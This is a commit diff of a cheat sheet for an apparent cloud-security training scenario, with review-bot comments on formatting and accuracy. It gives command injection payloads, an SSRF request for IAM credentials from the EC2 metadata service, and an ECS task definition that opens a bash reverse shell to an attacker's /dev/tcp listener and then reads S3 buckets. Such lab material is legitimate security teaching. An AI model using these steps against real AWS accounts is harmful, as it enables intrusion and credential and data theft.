Update scenario's cheat_sheet.md.
3iuy-prog committed Dec 13, 2023
1 parent fbd6278 commit 928ad74
Showing 1 changed file with 92 additions and 41 deletions.
133 changes: 92 additions & 41 deletions scenarios/ecs_privesc_evade_protection/cheat_sheet.md
Expand Up @@ -4,15 +4,17 @@ Go to `http://<ec2_ip_address>`

### Command Injection

```
```bash
# Command Injection on web.
; aws s3 ls
; aws s3 ls s3://<bucket-name>/
; aws s3 cp s3://<bucket-name>/flag.txt .
; cat flag.txt
```

### SSRF
```

```bash
# SSRF Attack.
http://<ec2_ip_address>/?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/<role>

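Review bot: the fence under `### SSRF` is now tagged `bash`, but its only content is the URL that goes into the `?url=` parameter, not a shell command, so a `text` tag is more accurate there (the added `# SSRF Attack.` line also reads as a shell comment in a block that is not shell). The new `# Command Injection on web.` comment would be more useful if it said which web input the `;`-prefixed commands are appended to, the way the bullet in the SSRF section below names the parameter for that path.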
Expand All @@ -34,11 +36,13 @@ Go to `http://<ec2_ip_address>`

### SSRF

```
http://<ec2_ip_address>/?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/<role>
aws configure --profile attacker
echo "aws_session_token = <token>" >> ~/.aws/credentials
```
* Using IPv6 to SSRF on web with `http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/<role>`
* Get credentials & using it to your CLI profile.

```bash
aws configure --profile attacker
echo "aws_session_token = <token>" >> ~/.aws/credentials
```

### Command Injection

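Review bot: `aws configure --profile attacker` prompts only for the access key, secret key, region and output format, so the session token still has to be added separately, but `echo "aws_session_token = <token>" >> ~/.aws/credentials` appends to the end of the file and only lands under `[attacker]` if that profile happens to be the last one; `aws configure set aws_session_token <token> --profile attacker` writes it into the right section regardless. The bullet "Get credentials & using it to your CLI profile." should read "Get the credentials and add them to a CLI profile."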
Expand All @@ -47,49 +51,96 @@ echo "aws_session_token = <token>" >> ~/.aws/credentials

### For more information

- more information about iam
- more information about iam.

```
aws sts get-caller-identity
aws iam get-role --role-name <role>
aws iam list-attached-role-policies --role-name <role>
aws iam list-role-policies --role-name <role>
aws iam get-role-policy --role-name <role> --policy-name <policy>
aws iam list-roles
```
```bash
aws sts get-caller-identity
aws iam list-roles
aws iam get-role --role-name <role>
aws iam list-attached-role-policies --role-name <role>
aws iam list-role-policies --role-name <role>
aws iam get-role-policy --role-name <role> --policy-name <policy>
````
- more information about ecs
- more information about ecs clusters.
```
aws ecs list-clusters --region <region>
aws ecs describe-clusters --region <region> --clusters <cluster>
aws ecs list-container-instances --region <region> --cluster <cluster_arn>
```

### ECS Privesc

* Attacker prepare revshell at other public ip point with `nc -lvp 4000`.
```bash
aws ecs list-clusters --region <region>
aws ecs describe-clusters --region <region> --clusters <cluster>
aws ecs list-container-instances --region <region> --cluster <cluster_arn>
```
- find available vpc subnets.

* And now come back to CLI.
```bash
aws ec2 describe-subnets --region <region>
```

```
# ECS Task definition with revshell command.
aws ecs register-task-definition --region <region> --family <task_name> --task-role-arn <task_role_arn> --network-mode "awsvpc" --cpu 256 --memory 512 --requires-compatibilities "[\"FARGATE\"]" --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/<revshell_ip>/<revshell_port> 0>&1\\\"\"]}]"
### ECS Privesc

# For run-task, find available subnets.
aws ec2 describe-subnets --region <region>
# Run task.
aws ecs run-task --region <region> --task-definition <task_name> --cluster <cluster_arn> --launch-type FARGATE --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"<subnet>\"]}}"
```
After a few minutes, the revshell will be connected by container.
Let's do it on revshell.
1. Attacker prepare revshell at other public ip point with `nc -lvp 4000`.

2. And now come back to CLI.

3. Create an ECS Task Definition JSON File:

Create a file named task-definition.json and include the following content.
Replace `<region>`, `<task_name>`, `<task_role_arn>`, `<revshell_ip>`, and `<revshell_port>` with your actual values.

```json
{
"family": "<task_name>",
"taskRoleArn": "<task_role_arn>",
"networkMode": "awsvpc",
"cpu": "256",
"memory": "512",
"requiresCompatibilities": ["FARGATE"],
"containerDefinitions": [
{
"name": "exfil_creds",
"image": "python:latest",
"entryPoint": ["sh", "-c"],
"command": ["/bin/bash -c \\\"bash -i >& /dev/tcp/<revshell_ip>/<revshell_port> 0>&1\\\""]
}
]
}
```

4. Create an ECS Run Task JSON File.

Create a file named run-task.json and include the following content. Replace `<subnet>` with the actual values for your setup.

```json
{
"launchType": "FARGATE",
"networkConfiguration": {
"awsvpcConfiguration": {
"assignPublicIp": "ENABLED",
"subnets": ["<subnet>"]
}
}
}
```

5. Register Task Definition and Run Task

Now, you can use the AWS CLI with the JSON files to execute the commands.

```bash
# Register task definition
aws ecs register-task-definition --region <region> --cli-input-json file://task-definition.json
# Run task
aws ecs run-task --region <region> --task-definition <task_name> --cluster <cluster_name> --cli-input-json file://run-task.json
```

After a few minutes, the revshell will be connected by container.
Let's access to s3 on revshell.
### Access S3
```
apt-get update
apt-get install awscli
```bash
apt update
apt install awscli
aws s3 ls
aws s3 ls s3://<bucket-name>/
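Review bot: in step 3 the sentence "Replace `<region>`, `<task_name>`, `<task_role_arn>`, ..." lists `<region>` among the placeholders in task-definition.json, but the file has no region field; region is only supplied as `--region` in step 5, so drop it from that list. Three smaller points in the same hunk: the IAM fence is closed with four backticks (````) where every other fence uses three; the `command` value in task-definition.json keeps the `\\\"` escaping from the old inline `--container-definitions` shell argument, which in a JSON file yields literal backslashes in the string (JSON needs only `\"` for an embedded quote); and step 5 passes `--cluster <cluster_name>` while the `list-container-instances` line above uses `<cluster_arn>`, so one placeholder should be used throughout. Wording: "After a few minutes, the revshell will be connected by container." reads better as "After a few minutes the container connects back to the listener.", and "Let's access to s3 on revshell." as "Access S3 from the reverse shell."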
